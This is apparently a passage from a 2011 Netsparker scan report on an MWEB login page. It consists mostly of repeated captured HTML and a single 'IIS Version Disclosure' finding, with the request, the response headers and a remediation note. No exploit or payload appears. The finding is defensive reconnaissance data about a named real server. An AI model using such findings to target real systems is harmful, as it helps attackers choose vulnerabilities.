<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" />
<input name="m_authType" type="hidden" id="m_authType" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidatorEmail");
RequiredFieldValidatorEmail.controltovalidate = "m_emailAddress";
RequiredFieldValidatorEmail.display = "None";
RequiredFieldValidatorEmail.evaluationfunction = "RequiredFieldValidato..
IIS Version Disclosure
IIS Version Disclosure
1
TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
Remediation
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /authentication.aspx
/authentication.aspx |
Extracted Version
Microsoft-IIS/6.0
Request
GET /authentication.aspx HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.signmein.co.za
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:21:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17429
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214551086341278" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Value cannot be null.
Parameter name: key</span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
